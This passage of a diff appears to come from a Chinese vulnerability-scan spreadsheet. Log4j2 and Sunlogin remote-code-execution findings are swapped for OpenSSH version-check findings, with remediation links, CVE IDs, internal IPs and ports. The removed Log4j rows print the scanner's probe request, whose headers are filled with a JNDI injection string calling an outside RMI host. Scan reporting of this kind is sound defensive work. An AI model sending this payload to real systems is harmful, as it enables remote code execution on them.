-Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Length: 45
-${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-响应体: HTTP/1.1 400 Bad Request
-Content-Type: text/html; charset=us-ascii
-Server: Microsoft-HTTPAPI/2.0
-Date: Fri, 09 Sep 2022 01:54:21 GMT
-Connection: close
-Content-Length: 311
-&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
-&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
-&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
-&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
-&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
-&lt;/BODY&gt;&lt;/HTML&gt;</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X5" t="inlineStr">
@@ -1156,7 +1015,7 @@
     <row r="6">
       <c r="A6" t="inlineStr">
         <is>
-          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+          <t>OpenSSH 竞争条件问题漏洞(CVE-2018-15473)</t>
         </is>
       </c>
       <c r="B6" t="inlineStr">
@@ -1166,64 +1025,63 @@
       </c>
       <c r="C6" t="inlineStr">
         <is>
-          <t>严重</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D6" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>条件竞争</t>
         </is>
       </c>
       <c r="E6" t="inlineStr">
         <is>
-          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
-2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0</t>
         </is>
       </c>
       <c r="F6" t="inlineStr">
         <is>
-          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
-Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+          <t>OpenSSH 7.7及之前版本中存在竞争条件问题漏洞。该漏洞源于网络系统或产品在运行过程中，并发代码需要互斥地访问共享资源时，对于并发访问的处理不当。</t>
         </is>
       </c>
       <c r="G6" t="inlineStr">
         <is>
-          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H6" t="inlineStr">
         <is>
-          <t>STA</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I6" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J6" t="inlineStr">
         <is>
-          <t>CVE-2021-44228</t>
+          <t>CVE-2018-15473</t>
         </is>
       </c>
       <c r="K6" t="inlineStr">
         <is>
-          <t>2026-07-13 14:33</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L6" t="inlineStr">
         <is>
-          <t>2026-07-13 14:33</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M6" t="inlineStr">
         <is>
-          <t>10.223.2.62</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N6" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O6" t="inlineStr">
@@ -1232,11 +1090,7 @@
         </is>
       </c>
       <c r="P6" t="inlineStr"/>
-      <c r="Q6" t="inlineStr">
-        <is>
-          <t>b</t>
-        </is>
-      </c>
+      <c r="Q6" t="inlineStr"/>
       <c r="R6" t="inlineStr">
         <is>
           <t>普通资产</t>
@@ -1249,63 +1103,18 @@
       </c>
       <c r="T6" t="inlineStr">
         <is>
-          <t>8080</t>
-        </is>
-      </c>
-      <c r="U6" t="inlineStr">
-        <is>
-          <t>10.223.2.62/</t>
-        </is>
-      </c>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U6" t="inlineStr"/>
       <c r="V6" t="inlineStr">
         <is>
-          <t>未暴露</t>
+          <t>未知</t>
         </is>
       </c>
       <c r="W6" t="inlineStr">
         <is>
-          <t>页面url: 10.223.2.62/
-请求体: POST / HTTP/1.1
-Host: 192.168.50.98
-User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept: */*
-Connection: keep-alive
-Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Type: application/x-www-form-urlencoded
-Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Length: 45
-${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-响应体: HTTP/1.1 400 Bad Request
-Content-Type: text/html; charset=us-ascii
-Server: Microsoft-HTTPAPI/2.0
-Date: Fri, 09 Sep 2022 01:54:21 GMT
-Connection: close
-Content-Length: 311
-&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
-&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
-&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
-&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
-&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
-&lt;/BODY&gt;&lt;/HTML&gt;</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X6" t="inlineStr">
@@ -1322,7 +1131,7 @@
     <row r="7">
       <c r="A7" t="inlineStr">
         <is>
-          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+          <t>OpenSSH 安全漏洞(CVE-2017-15906)</t>
         </is>
       </c>
       <c r="B7" t="inlineStr">
@@ -1332,59 +1141,53 @@
       </c>
       <c r="C7" t="inlineStr">
         <is>
-          <t>严重</t>
-        </is>
-      </c>
-      <c r="D7" t="inlineStr">
-        <is>
-          <t>代码执行</t>
-        </is>
-      </c>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D7" t="inlineStr"/>
       <c r="E7" t="inlineStr">
         <is>
-          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
-2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.openssh.com/txt/release-7.6</t>
         </is>
       </c>
       <c r="F7" t="inlineStr">
         <is>
-          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
-Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+          <t>OpenSSH 7.6之前的版本中的sftp-server.c文件的‘process_open’函数存在安全漏洞，该漏洞源于程序在只读模式下没有正确的阻止写入操作。攻击者可利用该漏洞创建长度为零的文件。</t>
         </is>
       </c>
       <c r="G7" t="inlineStr">
         <is>
-          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H7" t="inlineStr">
         <is>
-          <t>STA</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I7" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J7" t="inlineStr">
         <is>
-          <t>CVE-2021-44228</t>
+          <t>CVE-2017-15906</t>
         </is>
       </c>
       <c r="K7" t="inlineStr">
         <is>
-          <t>2026-07-13 14:21</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L7" t="inlineStr">
         <is>
-          <t>2026-07-13 14:21</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M7" t="inlineStr">
         <is>
-          <t>172.30.15.44</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N7" t="inlineStr">
@@ -1394,18 +1197,14 @@
       </c>
       <c r="O7" t="inlineStr">
         <is>
-          <t>未归类组</t>
+          <t>管理IP范围</t>
         </is>
       </c>
       <c r="P7" t="inlineStr"/>
-      <c r="Q7" t="inlineStr">
-        <is>
-          <t>test-phone</t>
-        </is>
-      </c>
+      <c r="Q7" t="inlineStr"/>
       <c r="R7" t="inlineStr">
         <is>
-          <t>核心资产</t>
+          <t>普通资产</t>
         </is>
       </c>
       <c r="S7" t="inlineStr">
@@ -1415,14 +1214,10 @@
       </c>
       <c r="T7" t="inlineStr">
         <is>
-          <t>8080</t>
-        </is>
-      </c>
-      <c r="U7" t="inlineStr">
-        <is>
-          <t>172.30.15.44/</t>
-        </is>
-      </c>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U7" t="inlineStr"/>
       <c r="V7" t="inlineStr">
         <is>
           <t>未知</t>
@@ -1430,48 +1225,7 @@
       </c>
       <c r="W7" t="inlineStr">
         <is>
-          <t>页面url: 172.30.15.44/
-请求体: POST / HTTP/1.1
-Host: 192.168.50.98
-User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept: */*
-Connection: keep-alive
-Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Type: application/x-www-form-urlencoded
-Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Length: 45
-${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-响应体: HTTP/1.1 400 Bad Request
-Content-Type: text/html; charset=us-ascii
-Server: Microsoft-HTTPAPI/2.0
-Date: Fri, 09 Sep 2022 01:54:21 GMT
-Connection: close
-Content-Length: 311
-&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
-&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
-&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
-&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
-&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
-&lt;/BODY&gt;&lt;/HTML&gt;</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X7" t="inlineStr">
@@ -1488,7 +1242,7 @@
     <row r="8">
       <c r="A8" t="inlineStr">
         <is>
-          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+          <t>OpenSSH 拒绝服务漏洞(CVE-2016-1907)</t>
         </is>
       </c>
       <c r="B8" t="inlineStr">
@@ -1498,64 +1252,63 @@
       </c>
       <c r="C8" t="inlineStr">
         <is>
-          <t>严重</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D8" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>拒绝服务</t>
         </is>
       </c>
       <c r="E8" t="inlineStr">
         <is>
-          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
-2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F8" t="inlineStr">
         <is>
-          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
-Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.1p2之前版本的packet.c文件中的‘ssh_packet_read_poll2’函数中存在安全漏洞。远程攻击者可借助特制的网络流量利用该漏洞造成拒绝服务（越边界读取和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G8" t="inlineStr">
         <is>
-          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H8" t="inlineStr">
         <is>
-          <t>STA</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I8" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J8" t="inlineStr">
         <is>
-          <t>CVE-2021-44228</t>
+          <t>CVE-2016-1907</t>
         </is>
       </c>
       <c r="K8" t="inlineStr">
         <is>
-          <t>2026-07-13 14:17</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L8" t="inlineStr">
         <is>
-          <t>2026-07-13 14:17</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M8" t="inlineStr">
         <is>
-          <t>192.168.50.17</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N8" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O8" t="inlineStr">
@@ -1577,14 +1330,10 @@
       </c>
       <c r="T8" t="inlineStr">
         <is>
-          <t>8080</t>
-        </is>
-      </c>
-      <c r="U8" t="inlineStr">
-        <is>
-          <t>192.168.50.17/</t>
-        </is>
-      </c>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U8" t="inlineStr"/>
       <c r="V8" t="inlineStr">
         <is>
           <t>未知</t>
@@ -1592,48 +1341,7 @@
       </c>
       <c r="W8" t="inlineStr">
         <is>
-          <t>页面url: 192.168.50.17/
-请求体: POST / HTTP/1.1
-Host: 192.168.50.98
-User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept: */*
-Connection: keep-alive
-Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Type: application/x-www-form-urlencoded
-Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Length: 45
-${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-响应体: HTTP/1.1 400 Bad Request
-Content-Type: text/html; charset=us-ascii
-Server: Microsoft-HTTPAPI/2.0
-Date: Fri, 09 Sep 2022 01:54:21 GMT
-Connection: close
-Content-Length: 311
-&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
-&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
-&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
-&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
-&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
-&lt;/BODY&gt;&lt;/HTML&gt;</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X8" t="inlineStr">
@@ -1650,7 +1358,7 @@
     <row r="9">
       <c r="A9" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>OpenSSH 远程代码执行漏洞(CVE-2016-10009)</t>
         </is>
       </c>
       <c r="B9" t="inlineStr">
@@ -1670,49 +1378,52 @@
       </c>
       <c r="E9" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.4</t>
         </is>
       </c>
       <c r="F9" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.4之前版本中的ssh-agent的ssh-agent.c文件存在代码问题漏洞。远程攻击者可通过控制转发的agent-socket利用该漏洞执行任意本地PKCS＃11模块。</t>
         </is>
       </c>
       <c r="G9" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H9" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I9" t="inlineStr">
         <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J9" t="inlineStr"/>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J9" t="inlineStr">
+        <is>
+          <t>CVE-2016-10009</t>
+        </is>
+      </c>
       <c r="K9" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L9" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M9" t="inlineStr">
         <is>
-          <t>192.168.64.44</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N9" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O9" t="inlineStr">
@@ -1734,7 +1445,7 @@
       </c>
       <c r="T9" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U9" t="inlineStr"/>
@@ -1745,29 +1456,7 @@
       </c>
       <c r="W9" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X9" t="inlineStr">
@@ -1784,7 +1473,7 @@
     <row r="10">
       <c r="A10" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515)</t>
         </is>
       </c>
       <c r="B10" t="inlineStr">
@@ -1799,54 +1488,58 @@
       </c>
       <c r="D10" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>拒绝服务</t>
         </is>
       </c>
       <c r="E10" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97</t>
         </is>
       </c>
       <c r="F10" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.3之前的版本中的sshd中的auth-passwd.c文件中的‘auth_password’函数存在输入验证错误漏洞，该漏洞源于程序没有在密码验证中限制密码长度。远程攻击者可借助长的字符串利用该漏洞造成拒绝服务(CPU消耗)。</t>
         </is>
       </c>
       <c r="G10" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H10" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I10" t="inlineStr">
         <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J10" t="inlineStr"/>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J10" t="inlineStr">
+        <is>
+          <t>CVE-2016-6515</t>
+        </is>
+      </c>
       <c r="K10" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L10" t="inlineStr">
         <is>
-          <t>2026-07-14 09:22</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M10" t="inlineStr">
         <is>
